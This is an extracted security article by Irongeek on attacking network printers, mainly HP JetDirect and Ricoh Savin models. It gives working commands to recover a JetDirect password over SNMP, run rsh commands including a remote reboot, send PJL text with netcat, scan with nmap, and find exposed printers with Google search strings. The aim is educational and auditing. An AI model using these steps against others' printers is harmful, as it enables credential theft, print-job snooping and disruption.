hacking network printers (m
TRANSCRIPT
Hacking etwork Printers(Mostly HP JetDirects, but a little info on the Ricoh Savins)
By Adrian "Irongeek" Crenshaw
Hack a printer you say, what kind of toner have you been smoking, Irongeek? Well, I'm here to tell you, there's
more that can be done with a printer to compromise network security than one might realize. In the olden days a
printer may not have been much of a concern other than the threat from folks dumpster diving for hard copies of the
documents that were printed from it, but many modern printers come network aware with embedded Operating
Systems, storage and full IP stacks. This article will attempt to point out some of the more interesting things that can
be done with a network based printer to make it reveal information about its users, owners and the network it's part
of.
Some of this article may seem a little Black-hat as it concentrates more on the breaking-in than the keeping-out.
However I feel this information will be useful to system administrators and auditors so that they know what sorts of
things to look out for when it comes to network printers. If you want more advice on how to lock down your network
printer visit your vendors web site. A guide from HP is linked at the bottom of this article for your convenience. If
nothing else, this article may get you thinking in the right direction.
For my tests I will mostly be using a Hewlett-Packard LaserJet 4100 MFP (Fax/Printer/Copier/Scanner), an HP
JetDirect 170x and a HP JetDirect 300X (J3263A) but I will also touch a bit on the Ricoh Savin series of printers lest
you think HPs are the only network printers with security problems.
Much of this article will read like a huge brain dump, sort of disorganized and hazy like my mind. It all started as
a project for Droop's Infonomicon TV and it snowballed from there with no specific direction. Bear with me as I clean
it up and other folks send me new additions and suggestions to make this article more useful.
The most recent version of this article can be found at: http://www.irongeek.com/i.php?page=security
/networkprinterhacking
Table of Contents:
Intro to the concepts
Diagnostics page
Stupid Printer Tricks
JetDirect password notes
Getting a JetDirect password remotely using the SNMP
vulnerability
Controlling the JetDirect box with telnet/web browser
RSH commands and Richo Savin Aficio Printers
Controlling the finding JetDirect boxes with JetAdmin
Finding Network printers using Nmap and SNMP tools
Finding info about the printer using SNMP tools
Finding Printers with Google
Using a JetDirect box as an Nmap Idlescan Zombie
Setting up a direct IP printer in Windows and Linux
Changing the LCD display text using HPhack, IGhphack
or Hijetter
Phenoelit's Hijetter and PFT
Setting the LCD Display with Hijetter
Changing settings with Hijetter
Using Hijetter to treat some JetDirect boxes as
files/web servers
Finding stored faxes and print jobs on Jetdirect
printers
Using IP ACLs to restrict access
Don't forget to look for Stored Documents via the web
interface
Coding your own scripts with PHP, Perl and PJL
Fixing a busted hard drive with Ghost
Sniffing print jobs and replaying them
A note on Plain-text authentication protocols
Other Ideas
Links to Tools
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
1 of 37 02/04/2009 08:17
Side note on a Pharos Uniprint vulnerability
Spamming Printers
DoSing the network or the printer
Media
Useful links for further research
Change Log
Intro to the concepts
There are several TLAs (Three letter acronyms) I will be using though out this article so I best get them out of
the way now. PCL stands for Printer Control Language, which was developed by HP and has become one of the most
common printer protocols. Another page description language you should be aware of is PostScript (PS) which was
designed by Adobe to allow for more complicated things to be printed from a plotter/printer. PJL (Printer Job
Language) is an extension of PCL that can tell a printer what to do, from changing device settings to transferring
files. There are also three major network printing protocols you should be aware of. Here's a table with some of the
pertinent information about each protocol:
ame Meaning Port
LPD Line Printer Daemon protocol 515/tcp
IPPaka
Berkeley printing system
Internet Printing Protocol 631/tcp
JetDirectaka
AppSocketaka
Rawaka
PDL-datastream
9100/tcp
Since my focus is on JetDirects I will mostly be talking about and using AppSocket/PDL-datastream, but since
many JetDirects can also work with IPP and LPD, and many non HP made network printers also use AppSocket, you
should be aware of the existence of all three. There's are also network printers that use the IPX, Appletalk and SMB
(some Savins for example) protocols to communicate. I'll not cover IPX and Appletalk because of my lack of
experience with them, maybe someone else who reads this page will submit some info on them for me to post (credit
will be given). SMB I may try to cover at a later time. Now that the formalities are out of the way, lets start playing
with printers.
Diagnostics page
The pictures above are of a external JetDirect
170x box. Notice the picture on the right; on the far
right hand side you will notice a little button labeled
"test". Pressing this button on most JetDirect boxes
will print out a diagnostic page listing statistics and
the IP setting for the JetDirect box. If your printer has
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
2 of 37 02/04/2009 08:17
an internal JetDirect card you will have to negotiate
the menus to find out how to print this diagnostics
page. Once you hit the test button the printer should
print out a page or two that lists information like host
name, MAC address, IP Address, subnet mask,
default gateway, firmware revision and some general
statistics. The IP/host name will be especially useful
if you want to bypass print quota software by setting
up direct IP printing on your Windows or Linux box.
If you don't have physical access to the JetDirect box
you can still find its IP or host name by seeing what
its port is listed as if that network printer has been
setup on a Windows box you have access to.
As you can see by the graphic on the left, the
host name for this JetDirect box is npib1002c.
Sometimes you will see a port listed as something like
IP_192.168.1.102, where obviously 192.168.1.102 is
the JetDirect's IP. You can pretty much use a host
name or an IP interchangeably on your LAN, and if the host name has a fully qualified domain name you should be
able to address it from the Internet as well.
If you don't have access to a JetDirect box, or if your PC is not connected to one, don't despair. In next few
sections I will describe how to find these printers on the LAN/Internet using Nmap and JetAdmin.
Stupid Printer Tricks
I called this section Stupid Printer Tricks because while these activities aren't very technical, they do illustrate the
simplicity of the RAW/AppSock protocol that listens on port 9100/tcp on JetDirects and most other network printers.
Try this, find your printers IP using the Diagnostics page then web surf to:
http://your-printers-ip:9100
The ":9100" at the end is there to tell your browser to connect on port 9100/tcp. When you try to establish the
connection you should notice that the browser does not go anywhere, this is because what's running on port 9100/tcp
is not a web server. Click the stop button on your browser to tell it to stop trying to connect then go take a look at the
printer. Depending on what browser you use you should see a print out something like one of the following:
Firefox Internet ExploiterGET / HTTP/1.1
Host: tux:9100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text
/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR
2.0.50727)
Host: test:9100
Connection: Keep-Alive
You see, anything that the printer sees coming in on port 9100/tcp it tries to read as a print job. The two texts
you see above are HTTP get requests for the root document of the server. The network printer does not understand
this and just tries to print the request out as text. Another thing you can try is telneting to port 9100 (we will assume
your printer's IP is 192.168.1.2), typing in some text, and seeing it print:
Irongeek:~# telnet 192.168.1.2 9100Trying 192.168.1.2...Connected to 192.168.1.2.Escape character is '^]'.hello printer
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
3 of 37 02/04/2009 08:17
^]telnet> quitConnection closed.Irongeek:~#
You should now see a print out that just has the words "hello printer" on it. The "^]" represents the pressing of
the Control key and the ] bracket at the same time. The above example was done in *nix, but the same commands
should work in Windows. Keep in mind you may not see all of what you type in (the parts in red) unless you have
local echo turned on (which seems to be off by default in Windows).
There are exceptions to network printers just printing out everything sent to port 9100. This trick, for which
there will be more details given later, should change LCD display to say what you want. It's not supported on all
printers, but If you have an HP it should work. I've got to thank Dipswitch for pointing out that you don't need fancy
tools or code to do it (but the tools do make it easier).
With Telnet:
Irongeek:~#$ telnet 192.169.1.2 9100@PJL RDYMSG DISPLAY="Some Text"^]quitIrongeek:#$
Or Netcat:
Irongeek:~#$ echo @PJL RDYMSG DISPLAY=\"Some Text\" | netcat -q 0 192.168.1.2 9100Irongeek:#$
JetDirect password notes
Most of the time folks never even turn the JetDirect's password options on, but if they do they quickly find that
they don't always work in logical ways.
If you are using a newer JetDirect box like one of the following:
680N (J6058A)
615N (J6057A)
610N (J4169A, J4167A)
380X (J6061A)
310X (J6038A,250M (J6042A)
75X(J6035A
or an HP printer with and internal JetDirect card like:
HP LaserJet 4100 series
HP LaserJet 8150 series
HP LaserJet 9000 series
HP Color LaserJet 4550 series
HP Color LaserJet 4600
HP Designjet 5000 series or HP Business Inkjet 2600
then the telnet and device password used by the Web interface and JetAdmin software are the same. If you telnet in
you will be prompted for a user name and password. The user names "root", "admin", "administrator" and
"supervisor" are all valid and equivalent.
If you are using an older JetDirect box like one of the following:
600N (J3110A, J3111A, J3112A, J3113A)
400N (J4100A, J4105A, J4106A)
300X
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
4 of 37 02/04/2009 08:17
500X
170X(J3296A, J4101B, J3263A, J3264A, 3265A, J4102B, J3258B)
then things are more confusing. First, if you telnet in you will only be prompted for a password; no user name is asked
for. If you setup a password for the telnet service it may not be the same password for the web interface, and vice
versa. In other words there are two passwords on at least some JetDirect boxes, one for telneting into it and one for
the web interface/JetAdmin software. Telnet password are case sensitive but Web/JetAdmin passwords are not.
Telnet passwords are limited to 16 characters, Web/JetAdmin passwords to 12. Just so you know, Hijetter (discussed
later) may report the password as disabled even if both passwords are set, but that's ok since it bypasses passwords
anyway.
The Web interface and JetAdmin use SNMP (Simple Network Management Protocol) to control the JetDirect
boxes and require that you know the password, but I've read that other third party SNMP configuration utilities will
just ignore the password altogether and can connect and control the JetDirect anyway. It might be a good idea for
some to change their SNMP community names to something other than the default public/private, but even if they do
they could still be sniffed off of the wire unless they have a more recent JetDirect that supports SNMPv3 and
SSL/TLS.
If you use the JetAdmin for Window 2000 desktop software be aware that it automatically stores passwords in
the registry once you use it. For example, if the MAC address of a JetDirect box was 001083A2C913 then JetAdmin
would store the password "password" in User\Software\Hewlett-Packard\HP JetAdmin\DeviceOptions
\001083A2C913 in a value called "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00". In case you
don't notice it, this HEX string is the password "password" converted to all uppercase, with each letter turned to it's
HEX equivalent, with a null character between each password character, and then null padded.
Brute forcing these passwords might be an option since logging on many network printers isn't all that involved.
As you already know telnet is unencrypted so sniffing those passwords is trivial. As I found by sniffing with Ethereal,
the web interface on older Jetdirects (really a Java applet) and JetAdmin use SNMP to configure the JetDirect box
and also pass their password as plain text. Look for the password just before the string "=108" in the dumps. Some
newer Jetdirects don't do this, and can use SSL to encrypt the connection.
If you set a password on a JetDirect box while you are playing around with it and forget what it is, all you have
to do is a hard reset. Unplug the power cord, hold down the test/status button, and while still holding the button plug
the power back in. The password and all of the other settings should now be cleared.
Getting a JetDirect password remotely using the SMP vulnerability
I was cruising around SecurityFocus.com looking for JetDirect exploits and I came across a dooze:
http://www.securityfocus.com/bid/7001/exploit
Since the link above is rather shy on details I'll show you the exploit step by step. It seems that the device
password for many JetDirects is stored in almost plain text and is accessible via SNMP using the read community
name. Most folks leave their SNMP community name as "public" but even it has been change it's likely sniffable.
Also try "internal" as the community name as this is the default write community name on many JetDirects. Reports
are that on some JetDirects , even if you change the community name, "internal" will still work. With the Net-SNMP
toolset the password is easy to recover:
Irongeek:~# snmpget -v 1 -c public 192.168.2.46 .1.3.6.1.4.1.11.2.3.9.1.1.13.0SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: 50 41 53 53 57 4F 52 44 3D 31 30 38 3B 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Irongeek:~#
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
5 of 37 02/04/2009 08:17
Notice the hex string. In Hex 50=P,41=A,53=S,53=S,57=W,4F=0,52=R,44=D,3D==,31=1,30=0,38=8,3B=;
In other words, "PASSWORD=108;" which means the password is "PASSWORD". I also tried it after changing the
password to newpassword, and likewise "50 41 53 53 57 4F 52 44 3D 31 30 38 3B" is "NEWPASSWORD=108;".
Anything before the "=108;" is the password. For those too lazy to do the HEX to ASCII conversion themselves
check out:
http://nickciske.com/tools/hex.php
Also note that I entered my passwords in lowercase, but they were stored in uppercase. These passwords are case
insensitive. Some of the vulnerable JetDirects are:
HP JetDirect J3263A
HP JetDirect J3113A
HP JetDirect J3111A
Other JetDirects may also be v\erle, so it's worth testing. I tried it with my Hewlett Packard HP JetDirect 300X
(J3263A) and installing the latest firmware (H.08.49) seems to fix this problem but I imagine there are still a lot of
un-patched JetDirects out there. Some print servers like the HP J3258A JetDirect 170X do not have user upgradeable
firmware at all so you are stuck with the firmware they were shipped with. The only way to fix the vulnerability on
them is to by a new JetDirect.
Controlling the JetDirect box with telnet/web browser
Most JetDirect boxes can be configured with a web browser or via a telnet session. Below you will see a screen
show of the web base configuration tool. Just type the IP or host name of the JetDirect box into the address bar of
your favorite Java enable web browser and it should work.
Here is an example of connecting to a JetDirect box with a telnet session, bringing up the help screen and
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
6 of 37 02/04/2009 08:17
resetting the host name:
Irongeek:~# telnet 192.168.1.2Trying 192.168.1.2...Connected to 192.168.1.2.Escape character is '^]'.
HP JetDirect
Please type "?" for HELP, or "/" for current settings> ?
To Change/Configure Parameters Enter:Parameter-name: value <Carriage Return>
Parameter-name Type of valueip: IP-address in dotted notationsubnet-mask: address in dotted notation (enter 0 for default)default-gw: address in dotted notation (enter 0 for default)syslog-svr: address in dotted notation (enter 0 for default)idle-timeout: seconds in integersset-cmnty-name: alpha-numeric string (32 chars max)host-name: alpha-numeric string (upper case only, 32 chars max)dhcp-config: 0 to disable, 1 to enableallow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)deleterawport: <TCP port num>listrawport: (No parameter required)
addstring: <name> <contents>contents - For non-printable characters use\xx for two digit hex numberdeletestring: <name>liststring: (No parameter required)addq: <name> [prepend] [append] [processing]prepend - The prepend string nameappend - The append string nameUse NULL for no stringprocessing - RAW, TEXT, or AUTOdeleteq: <name>listq: (No parameter required)defaultq: <name>
ipx/spx: 0 to disable, 1 to enabledlc/llc: 0 to disable, 1 to enableethertalk: 0 to disable, 1 to enablebanner: 0 to disable, 1 to enable
Type passwd to change the password.
Type "?" for HELP, "/" for current settings or "quit" to save-and-exit.Or type "exit" to exit without saving configuration parameter entries> /
===JetDirect Telnet Configuration===Firmware Rev. : H.08.32MAC Address : 00:60:b0:6d:47:c6Config By : DHCP
IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : NPI6D47C6
DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : Enabled> host-name:BUTTMONKEY> /
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
7 of 37 02/04/2009 08:17
===JetDirect Telnet Configuration===Firmware Rev. : H.08.32MAC Address : 00:60:b0:6d:47:c6Config By : DHCP
IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : BUTTMONKEY
DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : Enabled> quit
===JetDirect Parameters Configured===
IP Address : 192.168.1.2Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : Not SpecifiedHost Name : BUTTMONKEY
DHCP Config : EnabledPasswd : DisabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.Irongeek:~#
Important note about using telnet to configure a JetDirect box: You must use the "quit" command to end
your session if you want your changes to be saved. If you just kill the telnet terminal all of the changes you made
during the session will be lost.
RSH commands and Richo Savin Aficio Printers
I've got to thank Mslaviero for introducing me to this aspect of Richo Savin printers. Check out his site:
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Normally you might want to login to your Savin with telnet, but it's likely password protected (the default
password is "password" on some Savins). Don't fear, there is another way you may be able to execute some
commands on the printer. You may have noticed from an Nmap scan that your Richo Savin has port 514/tcp open.
Guess what? You can use the rsh *nix utility to execute commands remotely on the box. First you will want to make
sure you have the rsh client installed. Rsh has largely been depreciated because of it's unencrypted connections and
other security problems. If you try rsh on you Linux box it will likely try to use SSH automatically instead, which
won't work. If you have a Debian based distribution install rsh-client (apt-get install rsh-client) and try out some of
these commands to gather more information from your Savin printer:
The Info command will list the printers current configuration and supported options"
root@Irongeek:~# rsh 192.168.1.2 info(Input Tray)No. Name Page Size Status-------------------------------------------------------------------------------1 Tray 1 11 x 8 1/2" PaperEnd.2 Tray 2 11 x 8 1/2" Normal.3 LCT 11 x 8 1/2" Normal.4 Bypass Tray 11 x 8 1/2" PaperEnd.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
8 of 37 02/04/2009 08:17
(Output Tray)No. Name Status------------------------------------------------------------------------1 Internal Tray 1 Normal.2 Finisher Upper Tray Normal.3 Finisher Shift Tray Normal.
(Printer Language)No. Name Version--------------------------------------------------------1 Automatic Language Switching 2.21.5.32 Customized PJL 2.21.5.33 RPCS 2c.9.5a4 PCL 5e Emulation 1.015 PCL XL Emulation 1.016 Adobe PostScript 3 1.02
Stats gives you system stats (duh) :
root@Irongeek:~# rsh 192.168.1.2 statPrinter status : Printing.(Ready.)Online/Offline : Online.
Rank Owner Job Files Total Sizeactive anonymous 2491 (standard input) 126980 bytes
The syslog command will return information such as the version, wins server of the network, what daemons were
started and other bits of info:
root@Irongeek:~# rsh 192.168.1.2 syslog#[ncsd(17)]06/02/24 07:16:18 RICOH Aficio 2045e 2.40 INFO:#[ncsd(17)]06/02/24 07:16:18 Network Control Service 4.12 INFO:#[ncsd(17)]06/02/24 07:16:18 Copyright (C) 1994-2002 RICOH CO.,LTD. INFO:#[ncsd(17)]06/02/24 07:16:19 Ethernet started with IP: 192.168.1.2 INFO:#[inetd(42)]06/02/24 07:16:19 inetd start. INFO:#[snmpd(43)]06/02/24 07:16:19 Snmpd Start. INFO:#[httpd(44)]06/02/24 07:16:19 httpd start. INFO:#[ncsd(17)]06/02/24 07:16:19 Current Interface Speed : 100Mbps(full-duplex) INFO:#[nbtd(45)]06/02/24 07:16:19 nbtd start. INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=RNP82398B (Ethernet) INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=IGPrinter (Ethernet) INFO:#[nbtd(45)]06/02/24 07:16:19 Name registration success. WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP (Ethernet) INFO:#[multid(48)]06/02/24 07:16:21 multid start. INFO:#[diprintd(51)]06/02/24 07:16:21 started. INFO:#[lpd(52)]06/02/24 07:16:21 restarted INFO:#[snmpd(43)]06/02/24 07:16:28 Snmp over ip is ready. INFO:#[httpd(44)]06/02/24 07:16:28 ipp enable. INFO:#[httpd(44)]06/02/24 07:16:28 nrs disable. INFO:#[lpd(52)]06/03/06 22:19:28 bad request (71) from WARNING:#[lpd(52)]06/03/06 22:19:28 Illegal service request ERR:#[lpd(52)]06/03/06 22:19:28 Lost connection ERR:#[rshd(2570)]06/03/06 22:19:33 192.168.19.56 can't connect second port: 65360 INFO:#[rshd(2596)]06/03/06 22:50:32 (192.168.19.56) help: Command not supported. ERR:
Prnlog give you more information on recently print documents:
root@Irongeek:~# rsh 192.168.1.2 prnlogID User Page Result Time--------------------------------------------------------2472 2 Finished 06/03/06 21:292473 10 Finished 06/03/06 21:332474 1 Finished 06/03/06 21:582475 19 Finished 06/03/06 21:592476 3 Finished 06/03/06 22:162477 4 Finished 06/03/06 22:162478 2 Finished 06/03/06 22:172479 4 Finished 06/03/06 22:192480 5 Finished 06/03/06 22:222481 3 Finished 06/03/06 22:242482 2 Finished 06/03/06 22:292483 2 Finished 06/03/06 22:352484 1 Finished 06/03/06 22:372485 2 Finished 06/03/06 22:382486 2 Finished 06/03/06 22:382487 2 Finished 06/03/06 22:402488 6 Finished 06/03/06 22:402489 2 Finished 06/03/06 22:452490 4 Finished 06/03/06 22:522491 30 Finished 06/03/06 22:53
Ps will list the currently running processes:
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
9 of 37 02/04/2009 08:17
root@Irongeek:~# rsh 192.168.1.2 pspid=2605 [rshd]pid= 57 [pcl]pid= 55 [rsp]pid= 52 [lpd]pid= 51 [diprintd]pid= 49 [centrod]pid= 48 [multid]pid= 47 [gps-web]pid= 46 [gps-pm]pid= 45 [nbtd]pid= 44 [httpd]pid= 43 [snmpd]pid= 42 [inetd]pid= 41 [mcsc]pid= 40 [meu]pid= 38 [plotter_sa]pid= 36 [shmlog]pid= 35 [copy]pid= 34 [gps]pid= 33 [scan]pid= 32 [nfa]pid= 31 [wdb]pid= 30 [pts]pid= 29 [websys]pid= 23 [nrs]pid= 21 [dcs]pid= 19 [ous]pid= 18 [ucs]pid= 17 [ncsd]pid= 16 [ecs]pid= 15 [mcs]pid= 14 [fcuh]pid= 13 [scs]pid= 12 [imh]pid= 3 [checker]pid= 2 [pagedaemon]pid= 1 [init]pid= 0 [swapper]
The the print command prints whatever you tell it to on a sheet of paper (in this case just the word "test"):
root@Irongeek:~# rsh 192.168.1.2 printtestroot@Irongeek:~#
Also try "rsh ip-address reboot" to see if you can reset the printer remotely (check syslog to see if it worked.
Much the same information can be obtain by downloading files from the Savin printer's built in FTP server and
reading them in a text editor. See the screen shot below:
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
10 of 37 02/04/2009 08:17
Controlling and finding JetDirect boxes with JetAdmin
A nice tool Hewlett-Packard puts out for controlling JetDirect boxes is JetAdmin. Currently HP only offers a
web version of the software, called appropriately enough Web JetAdmin, with versions for both Windows and Linux.
Unfortunately you have to register on HP's site to get it, but you can download it without registering from this mirror
site:
http://www.svrops.com/svrops/dwnldprog.htm
Personally I prefer the older HP JetAdmin for Window 2000 (v3.42, the last version to be released before it was
discontinued but still works fine with XP) as it seems quicker and less bloated; however it may be missing some of the
features of the newer Web JetAdmin. You can download the desktop version from:
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
JetAdmin is very fast at finding
JetDirect boxes on your subnet since it
does an SNMP broadcast to the network to
locate them. Just right click and choose
"Properties" to find more information about
the JetDirect box, or choose "Modify" to
bring up a wizard that lets you change the
description, IP settings and other variables
associated with the printer.
JetAdmin can also generate reports
about the network printers it finds.
JetAdmin can do too many things for me to
describe them all in details here so go
download it and try it out.
As a side note, if you want to find
boxes on a network running Web JetAdmin
,do a ports scan for 8000/tcp (HTTP) and
8443/tcp (HTTPS); if it's password is weak
or non-existent it's an easy way to control a
network's printers. If you are interested in a JetAdmin like tool for the Ricoh Savin printers look into
SmartDeviceMonitor.
Finding etwork printers using map and SMP tools
Using Nmap from your Linux (preferable) or Windows box makes finding JetDirects and other network printers
pretty easy. The Nmap commands I will be showing in this section are very simple and not very stealthy so you may
want to consult the Nmap MAN page or a good Nmap tutorial for more ideas. You could use a simple Nmap
command like:
nmap -A 192.168.1.*
to scan the range 192.168.1.1-255 for common ports and do an OS and version detect on the systems it finds. The
output of the above command would look something like the following:
Irongeek:~# nmap -A 192.168.1.*
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
11 of 37 02/04/2009 08:17
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDTInteresting ports on igprinter (192.168.1.93):(The 1656 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION21/tcp open ftp HP JetDirect ftpd23/tcp open telnet?80/tcp open http HP Jetdirect httpd280/tcp open http HP Jetdirect httpd515/tcp open sdmsvc LANDesk Software Distribution (sdmsvc.exe)631/tcp open http HP Jetdirect httpd9100/tcp open jetdirect?Device type: printer|print serverRunning: HP embeddedOS details: HP LaserJet printer/print server
Nmap finished: 1 IP address (1 host up) scanned in 120.963 secondsIrongeek:~#
There's one problem with the simple command shown above. If you are using a version of Nmap before 3.90 on
some network printers it will create garbage print jobs with text like:
GET / HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS / RTSP/1.0
on each of the sheets printed, wasting a lot of paper. This happens because as Nmap scans for version detection on
port 9100/tcp it sends some of the probe requests from the nmap-service-probes file to figure out what service is
running on port 9100/tcp. Since the JetDirect box does not understand what it's being sent it just prints out the probes
and you wind up with a bunch of garbage printed out. The easiest way to fix this is to upgrade to Nmap 3.90 or better,
but barring that, there is a workaround. A better and faster solution might be to only probe for common network
printer ports other than 9100 (Note: You may want to leave off -T insane for stealth/bandwidth reasons):
nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane
or maybe not use the -A (which is like doing a -sV -sO together) option at all and just use -sO to detect the OS that's
running, but not send probes to the ports to find out the service versions are running.
While we are at it, it might be interesting to run a UDP scan on the JetDirect box as well.
Irongeek:~# nmap -sU 192.168.1.*
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDTInteresting ports on 192.168.1.93:(The 1474 ports scanned but not shown below are in state: closed)PORT STATE SERVICE137/udp open|filtered netbios-ns161/udp open|filtered snmp427/udp open|filtered svrloc32768/udp open|filtered omadMAC Address: 00:60:B0:6D:47:C6 (Hewlett-packard CO.)
Nmap finished: 1 IP address (1 host up) scanned in 86.238 secondsIrongeek:~#
As you can see we found quite a few ports to look into. I'll go over some of the things you can do with them in a
bit. By the way, you may notice the NMB port 137/udb is open, which means you may be able to find printers on the
LAN via the NetBIOS name service.
By the way, to find Ricoh Savins on the network you could use an Nmap command something like the following:
Irongeek:/# nmap -A 192.168.1.3 -T insane
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDTInteresting ports on 192.168.1.3:(The 1656 ports scanned but not shown beloware in state: closed)
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
12 of 37 02/04/2009 08:17
PORT STATE SERVICE VERSION21/tcp open ftp23/tcp open telnet?80/tcp open http?514/tcp open shell?515/tcp open printer lpd (error: Illegalservice request)631/tcp open ipp?9100/tcp open jetdirect?5 services unrecognized despite returning data.If you know the service/version, please submitthe following fingerprints athttp://www.insecure.org/cgi-bin/servicefp-submit.cgi :==============NEXT SERVICE FINGERPRINT (SUBMITINDIVIDUALLY)==============
...Omitted for security and space
reasons...MAC Address: 00:00:74:80:7C:B8 (Ricoh Company)Device type: general purposeRunning: NetBSDOS details: NetBSD 1.3I through 1.6Uptime 6.506 days (since Sat Sep 3 11:42:372005)
Nmap finished: 1 IP address (1 host up) scannedin 94.690 secondsIrongeek:/#
Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects, but that the the OS is
detected as NetBSD (it will even run on your toaster).
Since many network printers respond to SNMP another great way to find them is to use an SNMP service scanning
tool. Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor.
SmartDeviceMonitor seems to miss some network printers that aren't Savins, but if you use Richo Savin Aficio
printers on your network its a great tool for locating and polling them.
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan in another good choice:
http://www.foundstone.com/resources/proddesc/snscan.htm
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
13 of 37 02/04/2009 08:17
or Softperfect's NetScan if you turn on the SNMP search options:
http://www.softperfect.com/products/networkscanner/
Another third way you could find network printers (if you are on the same subnet) is to use Nmap or Cain to do
an ARP sweep and look for and boxes with a MAC address belonging to Hewlett Packard, Ricoh or another printer
vendor. These are likely network printers.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
14 of 37 02/04/2009 08:17
Finding Printers with Google
Sometimes for convenience admins will put links to there printers' web interfaces on an Intranet site so they can
easily admin them or pull off stored documents. Well, sometimes an Intranet is not really just an Intranet but
accessible via the Internet. Google is a great way to find these printers. Here are a few search strings that may be of
interest:
Ricoh Savins (Since these printer frequently store documents where to can be downloaded this can be a real killer for
security)
intitle:"web image monitor"
"/web/user/en/websys/webArch/mainFrame.cgi"
inurl:"/en/sts_index.cgi"
HP Jetdirects (Varies greatly from model to model)
inurl:hp/device/this.LCDispatcher
CUPS Connected Printers
inurl:":631/printers" -php -demo
